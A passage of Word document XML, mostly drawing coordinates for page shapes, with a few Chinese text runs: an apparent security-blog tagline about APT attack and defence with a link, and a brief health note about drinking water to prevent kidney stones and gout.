,1510,15718,1510,15713,1510,15709,1510,15705,1510,15700,1510,15696,1510,15691,1510,15686,1510,15681,1510,15676,1510,15671,1510,15666,1510,15661,1510,15655,1510,15649,1510,15644,1510,15638,1510,15632,1510,15626,1510,15620,1510,15613,1510,15607,1510,15600,1510,15593,1510,15587,1510,15580,1510,15572,1510,15565,1510,15558,1510,15550,1510,15542,1510,15535,1510,15527,1510,15519,1510,15510,1510,15502,1510,15493,1510,15485,1510,15476,1510,15467e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:772.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,15450" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:15450;width:30;height:370" coordorigin="1490,15450" coordsize="30,370" path="m1517,15467l1517,15467,1517,15467,1517,15467,1517,15467,1517,15467,1517,15467,1517,15467,1517,15467,1517,15467,1517,15467,1517,15467,1517,15467,1517,15467,1517,15467,1517,15467,1517,15468,1517,15468,1517,15468,1517,15468,1517,15468,1517,15469,1517,15469,1517,15469,1517,15469,1517,15470,1517,15470,1517,15471,1517,15471,1517,15471,1517,15472,1517,15473,1517,15473,1517,15474,1517,15474,1517,15475,1517,15476,1517,15477,1517,15478,1517,15479,1517,15479,1517,15480,1517,15482,1517,15483,1517,15484,1517,15485,1517,15486,1517,15488,1517,15489,1517,15490,1517,15492,1517,15494,1517,15495,1517,15497,1517,15499,1517,15500,1517,15502,1517,15504,1517,15506,1517,15508,1517,15511,1517,15513,1517,15515,1517,15518,1517,15520,1517,15523,1517,15525,1517,15528,1517,15531,1517,15534,1517,15537,1517,15540,1517,15543,1517,15547,1517,15550,1517,15553,1517,15557,1517,15561,1517,15564,1517,15568,1517,15572,1517,15576,1517,15580,1517,15585,1517,15589,1517,15593,1517,15598,1517,15603,1517,15608,1517,15612,1517,15617,1517,15623,1517,15628,1517,15633,1517,15639,1517,15644,1517,15650,1517,15656,1517,15662,1517,15668,1517,15674,1517,15681,1517,15687,1517,15694,1517,15700,1517,15707,1517,15714,1517,15721,1517,15729,1517,15736,1517,15744,1517,15751,1517,15759,1517,15767,1517,15775,1517,15783,1517,15792,1517,15800,1517,15809,1517,15818,1517,15827e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:235.500pt;margin-top:408.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4710,8170" coordsize="130,270">
        <v:shape style="position:absolute;left:4710;top:8170;width:130;height:270" coordorigin="4710,8170" coordsize="130,270" path="m4736,8188l4736,8188,4736,8188,4736,8188,4736,8188,4736,8188,4736,8188,4736,8188,4736,8188,4736,8188,4736,8188,4736,8188,4736,8188,4737,8188,4737,8188,4737,8188,4737,8188,4737,8188,4737,8188,4737,8188,4737,8188,4737,8188,4737,8188,4737,8188,4737,8188,4737,8188,4737,8188,4738,8188,4738,8188,4738,8188,4738,8188,4738,8188,4739,8188,4739,8188,4739,8188,4739,8188,4739,8188,4740,8188,4740,8188,4740,8188,4741,8188,4741,8188,4741,8188,4742,8188,4742,8188,4742,8188,4743,8188,4743,8188,4744,8188,4744,8188,4745,8188,4745,8188,4746,8188,4746,8188,4747,8188,4748,8188,4748,8188,4749,8188,4750,8188,4750,8188,4751,8188,4752,8188,4753,8188,4753,8188,4754,8188,4755,8188,4756,8188,4757,8188,4758,8188,4759,8188,4760,8188,4761,8188,4762,8188,4763,8188,4764,8188,4765,8188,4766,8188,4768,8188,4769,8188,4770,8188,4772,8188,4773,8188,4774,8188,4776,8188,4777,8188,4779,8188,4780,8188,4782,8188,4783,8188,4785,8188,4787,8188,4788,8188,4790,8188,4792,8188,4794,8188,4796,8188,4797,8188,4799,8188,4801,8188,4803,8188,4806,8188,4808,8188,4810,8188,4812,8188,4814,8188,4817,8188,4819,8188,4821,8188,4824,8188,4826,8188,4829,8188,4831,8188,4834,8188,4836,8188,4839,8188,4842,8188,4845,8188,4848,8188,4850,8188,4853,8188,4856,8188,4856,8188,4856,8188,4856,8188,4856,8188,4856,8188,4856,8188,4856,8188,4856,8188,4856,8188,4856,8188,4856,8188,4856,8188,4856,8188,4856,8188,4856,8189,4856,8189,4856,8189,4856,8189,4856,8189,4856,8189,4856,8189,4856,8190,4856,8190,4856,8190,4856,8190,4856,8190,4856,8191,4856,8191,4856,8191,4856,8192,4856,8192,4856,8193,4856,8193,4856,8194,4856,8194,4856,8195,4856,8195,4856,8196,4856,8196,4856,8197,4856,8198,4856,8199,4856,8199,4856,8200,4856,8201,4856,8202,4856,8203,4856,8204,4856,8205,4856,8206,4856,8207,4856,8208,4856,8209,4856,8211,4856,8212,4856,8213,4856,8215,4856,8216,4856,8218,4856,8219,4856,8221,4856,8222,4856,8224,4856,8226,4856,8228,4856,8230,4856,8232,4856,8234,4856,8236,4856,8238,4856,8240,4856,8242,4856,8245,4856,8247,4856,8249,4856,8252,4856,8255,4856,8257,4856,8260,4856,8263,4856,8266,4856,8269,4856,8272,4856,8275,4856,8278,4856,8281,4856,8284,4856,8288,4856,8291,4856,8295,4856,8298,4856,8302,4856,8306,4856,8310,4856,8314,4856,8318,4856,8322,4856,8326,4856,8331,4856,8335,4856,8340,4856,8344,4856,8349,4856,8354,4856,8358,4856,8363,4856,8368,4856,8374,4856,8379,4856,8384,4856,8390,4856,8395,4856,8401,4856,8407,4856,8412,4856,8418,4856,8424,4856,8431,4856,8437,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4856,8443,4855,8443,4855,8443,4855,8443,4855,8443,4855,8443,4855,8443,4855,8443,4854,8443,4854,8443,4854,8443,4854,8443,4853,8443,4853,8443,4853,8443,4853,8443,4852,8443,4852,8443,4852,8443,4851,8443,4851,8443,4850,8443,4850,8443,4850,8443,4849,8443,4849,8443,4848,8443,4848,8443,4847,8443,4846,8443,4846,8443,4845,8443,4845,8443,4844,8443,4843,8443,4843,8443,4842,8443,4841,8443,4840,8443,4839,8443,4839,8443,4838,8443,4837,8443,4836,8443,4835,8443,4834,8443,4833,8443,4832,8443,4831,8443,4830,8443,4829,8443,4828,8443,4826,8443,4825,8443,4824,8443,4823,8443,4821,8443,4820,8443,4819,8443,4817,8443,4816,8443,4814,8443,4813,8443,4811,8443,4810,8443,4808,8443,4806,8443,4805,8443,4803,8443,4801,8443,4799,8443,4797,8443,4795,8443,4793,8443,4791,8443,4789,8443,4787,8443,4785,8443,4783,8443,4781,8443,4779,8443,4776,8443,4774,8443,4772,8443,4769,8443,4767,8443,4764,8443,4762,8443,4759,8443,4756,8443,4754,8443,4751,8443,4748,8443,4745,8443,4742,8443,4739,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8443,4736,8442,4736,8442,4736,8442,4736,8442,4736,8442,4736,8441,4736,8441,4736,8441,4736,8441,4736,8440,4736,8440,4736,8440,4736,8439,4736,8439,4736,8438,4736,8438,4736,8437,4736,8437,4736,8436,4736,8436,4736,8435,4736,8434,4736,8434,4736,8433,4736,8432,4736,8431,4736,8430,4736,8429,4736,8429,4736,8428,4736,8427,4736,8425,4736,8424,4736,8423,4736,8422,4736,8421,4736,8419,4736,8418,4736,8417,4736,8415,4736,8414,4736,8412,4736,8411,4736,8409,4736,8407,4736,8405,4736,8404,4736,8402,4736,8400,4736,8398,4736,8396,4736,8394,4736,8391,4736,8389,4736,8387,4736,8384,4736,8382,4736,8379,4736,8377,4736,8374,4736,8371,4736,8369,4736,8366,4736,8363,4736,8360,4736,8357,4736,8354,4736,8350,4736,8347,4736,8344,4736,8340,4736,8337,4736,8333,4736,8329,4736,8325,4736,8321,4736,8318,4736,8313,4736,8309,4736,8305,4736,8301,4736,8296,4736,8292,4736,8287,4736,8283,4736,8278,4736,8273,4736,8268,4736,8263,4736,8258,4736,8253,4736,8247,4736,8242,4736,8236,4736,8231,4736,8225,4736,8219,4736,8213,4736,8207,4736,8201,4736,8195,4736,8188e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:271.500pt;margin-top:408.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="5430,8170" coordsize="130,270">
        <v:shape style="position:absolute;left:5430;top:8170;width:130;height:270" coordorigin="5430,8170" coordsize="130,270" path="m5457,8188l5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5457,8188,5458,8188,5458,8188,5458,8188,5458,8188,5458,8188,5458,8188,5458,8188,5458,8188,5459,8188,5459,8188,5459,8188,5459,8188,5460,8188,5460,8188,5460,8188,5460,8188,5461,8188,5461,8188,5461,8188,5462,8188,5462,8188,5462,8188,5463,8188,5463,8188,5464,8188,5464,8188,5465,8188,5465,8188,5466,8188,5466,8188,5467,8188,5467,8188,5468,8188,5469,8188,5469,8188,5470,8188,5471,8188,5471,8188,5472,8188,5473,8188,5474,8188,5475,8188,5475,8188,5476,8188,5477,8188,5478,8188,5479,8188,5480,8188,5481,8188,5482,8188,5483,8188,5484,8188,5486,8188,5487,8188,5488,8188,5489,8188,5491,8188,5492,8188,5493,8188,5495,8188,5496,8188,5497,8188,5499,8188,5501,8188,5502,8188,5504,8188,5505,8188,5507,8188,5509,8188,5510,8188,5512,8188,5514,8188,5516,8188,5518,8188,5520,8188,5522,8188,5524,8188,5526,8188,5528,8188,5530,8188,5532,8188,5535,8188,5537,8188,5539,8188,5542,8188,5544,8188,5546,8188,5549,8188,5552,8188,5554,8188,5557,8188,5560,8188,5562,8188,5565,8188,5568,8188,5571,8188,5574,8188,5577,8188,5577,8188,5577,8188,5577,8188,5577,8188,5577,8188,5577,8188,5577,8188,5577,8188,5577,8188,5577,8188,5577,8188,5577,8188,5577,8188,5577,8188,5577,8189,5577,8189,5577,8189,5577,8189,5577,8189,5577,8189,5577,8189,5577,8190,5577,8190,5577,8190,5577,8190,5577,8190,5577,8191,5577,8191,5577,8191,5577,8192,5577,8192,5577,8193,5577,8193,5577,8194,5577,8194,5577,8195,5577,8195,5577,8196,5577,8196,5577,8197,5577,8198,5577,8199,5577,8199,5577,8200,5577,8201,5577,8202,5577,8203,5577,8204,5577,8205,5577,8206,5577,8207,5577,8208,5577,8209,5577,8211,5577,8212,5577,8213,5577,8215,5577,8216,5577,8218,5577,8219,5577,8221,5577,8222,5577,8224,5577,8226,5577,8228,5577,8230,5577,8232,5577,8234,5577,8236,5577,8238,5577,8240,5577,8242,5577,8245,5577,8247,5577,8249,5577,8252,5577,8255,5577,8257,5577,8260,5577,8263,5577,8266,5577,8269,5577,8272,5577,8275,5577,8278,5577,8281,5577,8284,5577,8288,5577,8291,5577,8295,5577,8298,5577,8302,5577,8306,5577,8310,5577,8314,5577,8318,5577,8322,5577,8326,5577,8331,5577,8335,5577,8340,5577,8344,5577,8349,5577,8354,5577,8358,5577,8363,5577,8368,5577,8374,5577,8379,5577,8384,5577,8390,5577,8395,5577,8401,5577,8407,5577,8412,5577,8418,5577,8424,5577,8431,5577,8437,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5577,8443,5576,8443,5576,8443,5576,8443,5576,8443,5576,8443,5576,8443,5576,8443,5576,8443,5576,8443,5576,8443,5575,8443,5575,8443,5575,8443,5575,8443,5575,8443,5574,8443,5574,8443,5574,8443,5574,8443,5573,8443,5573,8443,5573,8443,5573,8443,5572,8443,5572,8443,5572,8443,5571,8443,5571,8443,5570,8443,5570,8443,5569,8443,5569,8443,5568,8443,5568,8443,5567,8443,5567,8443,5566,8443,5566,8443,5565,8443,5564,8443,5564,8443,5563,8443,5562,8443,5561,8443,5561,8443,5560,8443,5559,8443,5558,8443,5557,8443,5556,8443,5555,8443,5554,8443,5553,8443,5552,8443,5551,8443,5550,8443,5549,8443,5548,8443,5547,8443,5546,8443,5544,8443,5543,8443,5542,8443,5540,8443,5539,8443,5538,8443,5536,8443,5535,8443,5533,8443,5531,8443,5530,8443,5528,8443,5527,8443,5525,8443,5523,8443,5521,8443,5520,8443,5518,8443,5516,8443,5514,8443,5512,8443,5510,8443,5508,8443,5506,8443,5503,8443,5501,8443,5499,8443,5497,8443,5494,8443,5492,8443,5490,8443,5487,8443,5485,8443,5482,8443,5479,8443,5477,8443,5474,8443,5471,8443,5468,8443,5466,8443,5463,8443,5460,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8443,5457,8442,5457,8442,5457,8442,5457,8442,5457,8442,5457,8441,5457,8441,5457,8441,5457,8441,5457,8440,5457,8440,5457,8440,5457,8439,5457,8439,5457,8438,5457,8438,5457,8437,5457,8437,5457,8436,5457,8436,5457,8435,5457,8434,5457,8434,5457,8433,5457,8432,5457,8431,5457,8430,5457,8429,5457,8429,5457,8428,5457,8427,5457,8425,5457,8424,5457,8423,5457,8422,5457,8421,5457,8419,5457,8418,5457,8417,5457,8415,5457,8414,5457,8412,5457,8411,5457,8409,5457,8407,5457,8405,5457,8404,5457,8402,5457,8400,5457,8398,5457,8396,5457,8394,5457,8391,5457,8389,5457,8387,5457,8384,5457,8382,5457,8379,5457,8377,5457,8374,5457,8371,5457,8369,5457,8366,5457,8363,5457,8360,5457,8357,5457,8354,5457,8350,5457,8347,5457,8344,5457,8340,5457,8337,5457,8333,5457,8329,5457,8325,5457,8321,5457,8318,5457,8313,5457,8309,5457,8305,5457,8301,5457,8296,5457,8292,5457,8287,5457,8283,5457,8278,5457,8273,5457,8268,5457,8263,5457,8258,5457,8253,5457,8247,5457,8242,5457,8236,5457,8231,5457,8225,5457,8219,5457,8213,5457,8207,5457,8201,5457,8195,5457,8188e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:241.500pt;margin-top:514.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4830,10290" coordsize="130,250">
        <v:shape style="position:absolute;left:4830;top:10290;width:130;height:250" coordorigin="4830,10290" coordsize="130,250" path="m4856,10304l4856,10304,4856,10304,4856,10304,4856,10304,4856,10304,4856,10304,4856,10304,4856,10304,4856,10304,4856,10304,4857,10304,4857,10304,4857,10304,4857,10304,4857,10304,4857,10304,4857,10304,4857,10304,4857,10304,4857,10304,4857,10304,4857,10304,4857,10304,4857,10304,4857,10304,4858,10304,4858,10304,4858,10304,4858,10304,4858,10304,4858,10304,4859,10304,4859,10304,4859,10304,4859,10304,4860,10304,4860,10304,4860,10304,4860,10304,4861,10304,4861,10304,4861,10304,4862,10304,4862,10304,4863,10304,4863,10304,4863,10304,4864,10304,4864,10304,4865,10304,4865,10304,4866,10304,4866,10304,4867,10304,4868,10304,4868,10304,4869,10304,4870,10304,4870,10304,4871,10304,4872,10304,4873,10304,4873,10304,4874,10304,4875,10304,4876,10304,4877,10304,4878,10304,4879,10304,4880,10304,4881,10304,4882,10304,4883,10304,4884,10304,4885,10304,4887,10304,4888,10304,4889,10304,4890,10304,4892,10304,4893,10304,4894,10304,4896,10304,4897,10304,4899,10304,4900,10304,4902,10304,4903,10304,4905,10304,4907,10304,4908,10304,4910,10304,4912,10304,4914,10304,4916,10304,4918,10304,4919,10304,4921,10304,4924,10304,4926,10304,4928,10304,4930,10304,4932,10304,4934,10304,4937,10304,4939,10304,4941,10304,4944,10304,4946,10304,4949,10304,4951,10304,4954,10304,4957,10304,4959,10304,4962,10304,4965,10304,4968,10304,4971,10304,4974,10304,4977,10304,4977,10304,4977,10304,4977,10304,4977,10304,4977,10304,4977,10304,4977,10304,4977,10304,4977,10304,4977,10304,4977,10304,4977,10304,4977,10304,4977,10305,4977,10305,4977,10305,4977,10305,4977,10305,4977,10305,4977,10305,4977,10305,4977,10306,4977,10306,4977,10306,4977,10306,4977,10307,4977,10307,4977,10307,4977,10308,4977,10308,4977,10308,4977,10309,4977,10309,4977,10310,4977,10310,4977,10311,4977,10311,4977,10312,4977,10313,4977,10313,4977,10314,4977,10315,4977,10315,4977,10316,4977,10317,4977,10318,4977,10319,4977,10320,4977,10321,4977,10322,4977,10323,4977,10324,4977,10325,4977,10327,4977,10328,4977,10329,4977,10331,4977,10332,4977,10334,4977,10335,4977,10337,4977,10339,4977,10340,4977,10342,4977,10344,4977,10346,4977,10348,4977,10350,4977,10352,4977,10354,4977,10356,4977,10358,4977,10361,4977,10363,4977,10366,4977,10368,4977,10371,4977,10373,4977,10376,4977,10379,4977,10382,4977,10385,4977,10388,4977,10391,4977,10394,4977,10397,4977,10400,4977,10404,4977,10407,4977,10411,4977,10415,4977,10418,4977,10422,4977,10426,4977,10430,4977,10434,4977,10438,4977,10442,4977,10447,4977,10451,4977,10456,4977,10460,4977,10465,4977,10470,4977,10474,4977,10479,4977,10485,4977,10490,4977,10495,4977,10500,4977,10506,4977,10511,4977,10517,4977,10523,4977,10528,4977,10534,4977,10541,4977,10547,4977,10553,4977,10559,4977,10559,4977,10559,4977,10559,4977,10559,4977,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4976,10559,4975,10559,4975,10559,4975,10559,4975,10559,4975,10559,4975,10559,4974,10559,4974,10559,4974,10559,4974,10559,4973,10559,4973,10559,4973,10559,4973,10559,4972,10559,4972,10559,4972,10559,4971,10559,4971,10559,4970,10559,4970,10559,4970,10559,4969,10559,4969,10559,4968,10559,4968,10559,4967,10559,4966,10559,4966,10559,4965,10559,4965,10559,4964,10559,4963,10559,4963,10559,4962,10559,4961,10559,4960,10559,4960,10559,4959,10559,4958,10559,4957,10559,4956,10559,4955,10559,4954,10559,4953,10559,4952,10559,4951,10559,4950,10559,4949,10559,4948,10559,4946,10559,4945,10559,4944,10559,4943,10559,4941,10559,4940,10559,4939,10559,4937,10559,4936,10559,4934,10559,4933,10559,4931,10559,4930,10559,4928,10559,4926,10559,4925,10559,4923,10559,4921,10559,4919,10559,4917,10559,4915,10559,4913,10559,4911,10559,4909,10559,4907,10559,4905,10559,4903,10559,4901,10559,4899,10559,4896,10559,4894,10559,4892,10559,4889,10559,4887,10559,4884,10559,4882,10559,4879,10559,4876,10559,4874,10559,4871,10559,4868,10559,4865,10559,4862,10559,4859,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10559,4856,10558,4856,10558,4856,10558,4856,10558,4856,10558,4856,10557,4856,10557,4856,10557,4856,10557,4856,10556,4856,10556,4856,10556,4856,10555,4856,10555,4856,10554,4856,10554,4856,10553,4856,10553,4856,10552,4856,10552,4856,10551,4856,10550,4856,10550,4856,10549,4856,10548,4856,10547,4856,10546,4856,10546,4856,10545,4856,10544,4856,10543,4856,10542,4856,10540,4856,10539,4856,10538,4856,10537,4856,10535,4856,10534,4856,10533,4856,10531,4856,10530,4856,10528,4856,10527,4856,10525,4856,10523,4856,10521,4856,10520,4856,10518,4856,10516,4856,10514,4856,10512,4856,10510,4856,10507,4856,10505,4856,10503,4856,10500,4856,10498,4856,10495,4856,10493,4856,10490,4856,10487,4856,10485,4856,10482,4856,10479,4856,10476,4856,10473,4856,10470,4856,10466,4856,10463,4856,10460,4856,10456,4856,10453,4856,10449,4856,10445,4856,10441,4856,10438,4856,10434,4856,10430,4856,10425,4856,10421,4856,10417,4856,10412,4856,10408,4856,10403,4856,10399,4856,10394,4856,10389,4856,10384,4856,10379,4856,10374,4856,10369,4856,10363,4856,10358,4856,10352,4856,10347,4856,10341,4856,10335,4856,10329,4856,10323,4856,10317,4856,10311,4856,10304e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:313.500pt;margin-top:514.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6270,10290" coordsize="130,250">
        <v:shape style="position:absolute;left:6270;top:10290;width:130;height:250" coordorigin="6270,10290" coordsize="130,250" path="m6297,10304l6297,10304,6297,10304,6297,10304,6297,10304,6297,10304,6297,10304,6297,10304,6297,10304,6297,10304,6297,10304,6297,10304,6297,10304,6297,10304,6297,10304,6297,10304,6297,10304,6297,10304,6298,10304,6298,10304,6298,10304,6298,10304,6298,10304,6298,10304,6298,10304,6298,10304,6298,10304,6298,10304,6299,10304,6299,10304,6299,10304,6299,10304,6299,10304,6300,10304,6300,10304,6300,10304,6300,10304,6300,10304,6301,10304,6301,10304,6301,10304,6302,10304,6302,10304,6302,10304,6303,10304,6303,10304,6304,10304,6304,10304,6305,10304,6305,10304,6306,10304,6306,10304,6307,10304,6307,10304,6308,10304,6308,10304,6309,10304,6310,10304,6310,10304,6311,10304,6312,10304,6313,10304,6313,10304,6314,10304,6315,10304,6316,10304,6317,10304,6318,10304,6319,10304,6320,10304,6321,10304,6322,10304,6323,10304,6324,10304,6325,10304,6326,10304,6327,10304,6328,10304,6330,10304,6331,10304,6332,10304,6334,10304,6335,10304,6336,10304,6338,10304,6339,10304,6341,10304,6342,10304,6344,10304,6346,10304,6347,10304,6349,10304,6351,10304,6353,10304,6354,10304,6356,10304,6358,10304,6360,10304,6362,10304,6364,10304,6366,10304,6368,10304,6371,10304,6373,10304,6375,10304,6377,10304,6380,10304,6382,10304,6384,10304,6387,10304,6389,10304,6392,10304,6395,10304,6397,10304,6400,10304,6403,10304,6406,10304,6408,10304,6411,10304,6414,10304,6417,10304,6417,10304,6417,10304,6417,10304,6417,10304,6417,10304,6417,10304,6417,10304,6417,10304,6417,10304,6417,10304,6417,10304,6417,10304,6417,10304,6417,10305,6417,10305,6417,10305,6417,10305,6417,10305,6417,10305,6417,10305,6417,10305,6417,10306,6417,10306,6417,10306,6417,10306,6417,10307,6417,10307,6417,10307,6417,10308,6417,10308,6417,10308,6417,10309,6417,10309,6417,10310,6417,10310,6417,10311,6417,10311,6417,10312,6417,10313,6417,10313,6417,10314,6417,10315,6417,10315,6417,10316,6417,10317,6417,10318,6417,10319,6417,10320,6417,10321,6417,10322,6417,10323,6417,10324,6417,10325,6417,10327,6417,10328,6417,10329,6417,10331,6417,10332,6417,10334,6417,10335,6417,10337,6417,10339,6417,10340,6417,10342,6417,10344,6417,10346,6417,10348,6417,10350,6417,10352,6417,10354,6417,10356,6417,10358,6417,10361,6417,10363,6417,10366,6417,10368,6417,10371,6417,10373,6417,10376,6417,10379,6417,10382,6417,10385,6417,10388,6417,10391,6417,10394,6417,10397,6417,10400,6417,10404,6417,10407,6417,10411,6417,10415,6417,10418,6417,10422,6417,10426,6417,10430,6417,10434,6417,10438,6417,10442,6417,10447,6417,10451,6417,10456,6417,10460,6417,10465,6417,10470,6417,10474,6417,10479,6417,10485,6417,10490,6417,10495,6417,10500,6417,10506,6417,10511,6417,10517,6417,10523,6417,10528,6417,10534,6417,10541,6417,10547,6417,10553,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6417,10559,6416,10559,6416,10559,6416,10559,6416,10559,6416,10559,6416,10559,6416,10559,6415,10559,6415,10559,6415,10559,6415,10559,6415,10559,6414,10559,6414,10559,6414,10559,6414,10559,6413,10559,6413,10559,6413,10559,6412,10559,6412,10559,6412,10559,6411,10559,6411,10559,6410,10559,6410,10559,6409,10559,6409,10559,6408,10559,6408,10559,6407,10559,6407,10559,6406,10559,6405,10559,6405,10559,6404,10559,6403,10559,6403,10559,6402,10559,6401,10559,6400,10559,6399,10559,6399,10559,6398,10559,6397,10559,6396,10559,6395,10559,6394,10559,6393,10559,6392,10559,6391,10559,6390,10559,6388,10559,6387,10559,6386,10559,6385,10559,6383,10559,6382,10559,6381,10559,6379,10559,6378,10559,6376,10559,6375,10559,6373,10559,6372,10559,6370,10559,6369,10559,6367,10559,6365,10559,6364,10559,6362,10559,6360,10559,6358,10559,6356,10559,6354,10559,6352,10559,6350,10559,6348,10559,6346,10559,6344,10559,6342,10559,6339,10559,6337,10559,6335,10559,6332,10559,6330,10559,6327,10559,6325,10559,6322,10559,6320,10559,6317,10559,6314,10559,6312,10559,6309,10559,6306,10559,6303,10559,6300,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10559,6297,10558,6297,10558,6297,10558,6297,10558,6297,10558,6297,10557,6297,10557,6297,10557,6297,10557,6297,10556,6297,10556,6297,10556,6297,10555,6297,10555,6297,10554,6297,10554,6297,10553,6297,10553,6297,10552,6297,10552,6297,10551,6297,10550,6297,10550,6297,10549,6297,10548,6297,10547,6297,10546,6297,10546,6297,10545,6297,10544,6297,10543,6297,10542,6297,10540,6297,10539,6297,10538,6297,10537,6297,10535,6297,10534,6297,10533,6297,10531,6297,10530,6297,10528,6297,10527,6297,10525,6297,10523,6297,10521,6297,10520,6297,10518,6297,10516,6297,10514,6297,10512,6297,10510,6297,10507,6297,10505,6297,10503,6297,10500,6297,10498,6297,10495,6297,10493,6297,10490,6297,10487,6297,10485,6297,10482,6297,10479,6297,10476,6297,10473,6297,10470,6297,10466,6297,10463,6297,10460,6297,10456,6297,10453,6297,10449,6297,10445,6297,10441,6297,10438,6297,10434,6297,10430,6297,10425,6297,10421,6297,10417,6297,10412,6297,10408,6297,10403,6297,10399,6297,10394,6297,10389,6297,10384,6297,10379,6297,10374,6297,10369,6297,10363,6297,10358,6297,10352,6297,10347,6297,10341,6297,10335,6297,10329,6297,10323,6297,10317,6297,10311,6297,10304e x" fillcolor="#fefefe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8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383838"/>
          <w:spacing w:val="10"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>专</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="383838"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注APT攻击与防御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3783"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>https://micro</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="003783"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="double" w:color="003783"/>
        </w:rPr>
        <w:t>poor.blogspot.com/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z w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>请多喝点热水或者凉白开，可预防</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>肾结石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通风</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>等。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痛风可伴</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>发肥胖症、高血压病、糖尿病、脂代谢紊乱等多种代谢性疾病。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21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4316"/>
        </w:tabs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-9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
